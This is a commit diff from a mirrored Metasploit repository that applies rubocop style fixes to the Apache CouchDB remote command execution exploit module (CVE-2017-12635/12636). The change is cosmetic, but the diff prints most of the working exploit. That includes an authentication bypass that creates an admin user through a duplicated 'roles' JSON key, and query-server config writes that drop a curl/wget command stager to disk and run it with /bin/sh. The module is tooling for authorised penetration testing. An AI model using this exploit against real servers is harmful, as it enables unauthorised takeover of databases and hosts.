infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Run rubocop -a

GSoC/Meterpreter_Web_Console
William Vu 2018-07-11 21:40:19 -05:00
parent 0ef0fae2b2
commit ca5e496b8f
1 changed files with 45 additions and 64 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

79
modules/exploits/linux/http/apache_couchdb_cmd_exec.rb
View File

@ -24,11 +24,11 @@ class MetasploitModule < Msf::Exploit::Remote
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
],
'References' => [
[ 'CVE', '2017-12636'],
[ 'CVE', '2017-12635'],
[ 'URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],
[ 'URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'],
[ 'URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E']
['CVE', '2017-12636'],
['CVE', '2017-12635'],
['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],
['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'],
['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E']
],
'DisclosureDate' => 'Apr 6 2016',
'License' => MSF_LICENSE,
@ -41,12 +41,11 @@ class MetasploitModule < Msf::Exploit::Remote
},
'CmdStagerFlavor' => ['curl', 'wget'],
'Targets' => [
['Automatic', {} ],
['Apache CouchDB version 1.x', {} ],
['Apache CouchDB version 2.x', {} ]
['Automatic', {}],
['Apache CouchDB version 1.x', {}],
['Apache CouchDB version 2.x', {}]
],
'DefaultTarget' => 0
))
'DefaultTarget' => 0))
register_options([
Opt::RPORT(5984),
@ -58,7 +57,8 @@ class MetasploitModule < Msf::Exploit::Remote
[
OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']),
OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp'])
])
]
)
end
def check
@ -67,9 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
return CheckCode::Unknown if version.version.empty?
vprint_status "Found CouchDB version #{version}"
if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))
return CheckCode::Appears
end
return CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))
CheckCode::Safe
end
@ -96,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
attempts.times do |i|
print_status("#{peer} - The #{i+1} time to exploit")
print_status("#{peer} - The #{i + 1} time to exploit")
send_payload(version)
Rex.sleep(5)
# break if we get the shell
@ -112,7 +110,6 @@ class MetasploitModule < Msf::Exploit::Remote
# the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization
# for the newly created user.
def auth_bypass
username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12)
password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12)
@auth = basic_auth(username, password)
@ -121,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, "/_users/org.couchdb.user:#{username}"),
'method' => 'PUT',
'ctype' => 'application/json',
'data' => %Q{{"type": "user","name": "#{username}","roles": ["_admin"],"roles": [],"password": "#{password}"}}
'data' => %({"type": "user","name": "#{username}","roles": ["_admin"],"roles": [],"password": "#{password}"})
)
if res && res.code == 200 && res.get_json_document['ok']
@ -129,7 +126,6 @@ class MetasploitModule < Msf::Exploit::Remote
else
return false
end
end
def get_version
@ -141,7 +137,6 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'GET',
'authorization' => @auth
)
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionError => e
vprint_bad("#{peer} - Connection failed")
return false
@ -177,9 +172,7 @@ class MetasploitModule < Msf::Exploit::Remote
vprint_status("#{peer} - CouchDB version is #{version}") if version
version = Gem::Version.new(@version)
case
# Version not found
when version.version.empty?
if version.version.empty?
vprint_warning("#{peer} - Cannot retrieve the version of CouchDB.")
# if target set Automatic, exploit failed.
@ -191,21 +184,19 @@ class MetasploitModule < Msf::Exploit::Remote
payload2
end
when version < Gem::Version.new('1.7.0')
elsif version < Gem::Version.new('1.7.0')
payload1
when version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))
elsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))
payload2
when version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')
elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')
fail_with(Failure::NotVulnerable, "#{peer} - The target is not vulnerable.")
end
end
# Exploit with multi requests
# payload1 is for the version of couchdb below 1.7.0
def payload1
rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)
rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)
rand_db = Rex::Text.rand_text_alpha_lower(4..12)
@ -218,8 +209,7 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd1}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %Q{"echo '#{@cmdstager}' > #{rand_file}"}
'data' => %("echo '#{@cmdstager}' > #{rand_file}")
)
res = send_request_cgi(
@ -232,7 +222,7 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %Q{{"_id": "#{rand_hex}"}}
'data' => %({"_id": "#{rand_hex}"})
)
res = send_request_cgi(
@ -240,14 +230,14 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'POST',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %Q{{"language":"#{rand_cmd1}","map":""}}
'data' => %({"language":"#{rand_cmd1}","map":""})
)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd2}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %Q{"/bin/sh #{rand_file}"}
'data' => %("/bin/sh #{rand_file}")
)
res = send_request_cgi(
@ -255,15 +245,12 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'POST',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %Q{{"language":"#{rand_cmd2}","map":""}}
'data' => %({"language":"#{rand_cmd2}","map":""})
)
end
# payload2 is for the version of couchdb below 2.1.1
def payload2
rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)
rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)
rand_db = Rex::Text.rand_text_alpha_lower(4..12)
@ -281,13 +268,11 @@ class MetasploitModule < Msf::Exploit::Remote
)
node = res.get_json_document['all_nodes'][0]
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd1}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %Q{"echo '#{@cmdstager}' > #{rand_file}"}
'data' => %("echo '#{@cmdstager}' > #{rand_file}")
)
res = send_request_cgi(
@ -300,7 +285,7 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %Q{{"_id": "#{rand_hex}"}}
'data' => %({"_id": "#{rand_hex}"})
)
res = send_request_cgi(
@ -308,15 +293,14 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'PUT',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %Q{{"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd1}"}}
'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd1}"})
)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd2}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %Q{"/bin/sh #{rand_file}"}
'data' => %("/bin/sh #{rand_file}")
)
res = send_request_cgi(
@ -324,7 +308,7 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'PUT',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %Q{{"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd2}"}}
'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd2}"})
)
end
@ -338,14 +322,13 @@ class MetasploitModule < Msf::Exploit::Remote
#
def on_request_uri(cli, request)
if (not @cmdstager)
if !@cmdstager
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("Sending payload #{datastore['PAYLOAD']}")
super
end
def start_service(opts = {})
@ -353,7 +336,6 @@ class MetasploitModule < Msf::Exploit::Remote
@service_url = get_uri
end
# mark the exploit successful and clean temp file created during exploiting
def on_new_session(client)
# mark flag be true to stop exploit.
@ -370,9 +352,8 @@ class MetasploitModule < Msf::Exploit::Remote
client.shell_command_token("rm #{@file_to_clean}")
end
vprint_good("Cleaned temp file successful.")
rescue
rescue StandardError
print_warning("Need to clean the temp file #{@file_to_clean} manually.")
end
end
end